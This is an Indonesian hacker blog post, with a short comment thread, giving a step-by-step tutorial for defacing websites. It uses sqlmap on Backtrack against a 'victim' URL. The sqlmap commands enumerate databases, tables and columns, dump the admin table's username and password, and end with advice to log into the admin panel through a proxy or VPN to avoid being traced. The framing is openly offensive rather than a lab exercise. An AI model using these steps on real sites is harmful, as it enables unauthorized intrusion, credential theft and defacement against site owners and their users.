BL4ZTERZT404
NOT FOUND!
Today : | at : | safemode : OFF| Security : Active
> / blazterzt404 / public_html / blog / post /

Dear sobat blogger blazterzt, blog blazterzt sudah aktif kembali silahkan cekout konten terbaru dari mas blazt.
name author perms com modified label

.:: Defacing - Deface Web dengan Sqlmap Linux Backtrack BLAZTERROR rwxr-xr-x 2 1:08 PM

Filename .:: Defacing - Deface Web dengan Sqlmap Linux Backtrack
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 1:08 PM
Label
Action

Hack website using Backtrack (sqlmap)


In my previous tutorial I have explained what is backtrack, now in this tutorial I am going to show you how to hack website using Backtrack 5 (sqlmap). Sqlmap is a automatic sql injection tool which helps you to hack website easily. Follow the simple steps to hack website using backtrack 5 sqlmap tool.

1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminalsql map 1
2. Now find the vulnerable site. (well I already have vulnerable site)
sql map 2
3. Now type this command in the terminal and hit enter.(refer above figure)
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs

4. Now you will get the database name of the website
sql map 3
Well I got the two database aj and information_schema we will select aj database.

5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D  (database name) –tables

6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables

sql map 4
7. Now you will get the tables list which is stored in aj database.
sql map 5

8. Now lets grab the columns from the admin table
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns
sql map 7
Now we got the columns and we got username and password
9. Now lets grab the passwords of the admin
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump
Now we got the username and the password of the website !
sql map 9
Now just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.

avatar Author : BLAZTERROR
Posting : .:: Defacing - Deface Web dengan Sqlmap Linux Backtrack
Time : 1:08 PM
Label :
Get The c0de and feel your soul ~ Indonesian c0ders

Baca Juga yang ini :



2 comments:

Izza009 said...

kok gx bisa bro...
malah ada pesan gini nih..python: can't open file 'sqlmap.py-u': [Errno 2] No such file or directory
gmana tuh?

BLAZTERROR said...

itu command nya salah mas , dan mungkin juga direktori sqlmap nya salah letak coba dipastikan dulu direktori nya. terus kembali di command nya dibenerin
sqlmap.py -u urlnya
tadi mas salah command mngkin.

 

BL4ZTERZT404_ © 2013 BL4ZTERZT404 Blogs All Right Reserved
Thx To B374K and p4r4ghcyb3rn3t, Template Redesign by BL4ZTERZT404 - Blogs

Find Our Facebook!
Join Indonesia Blog Community!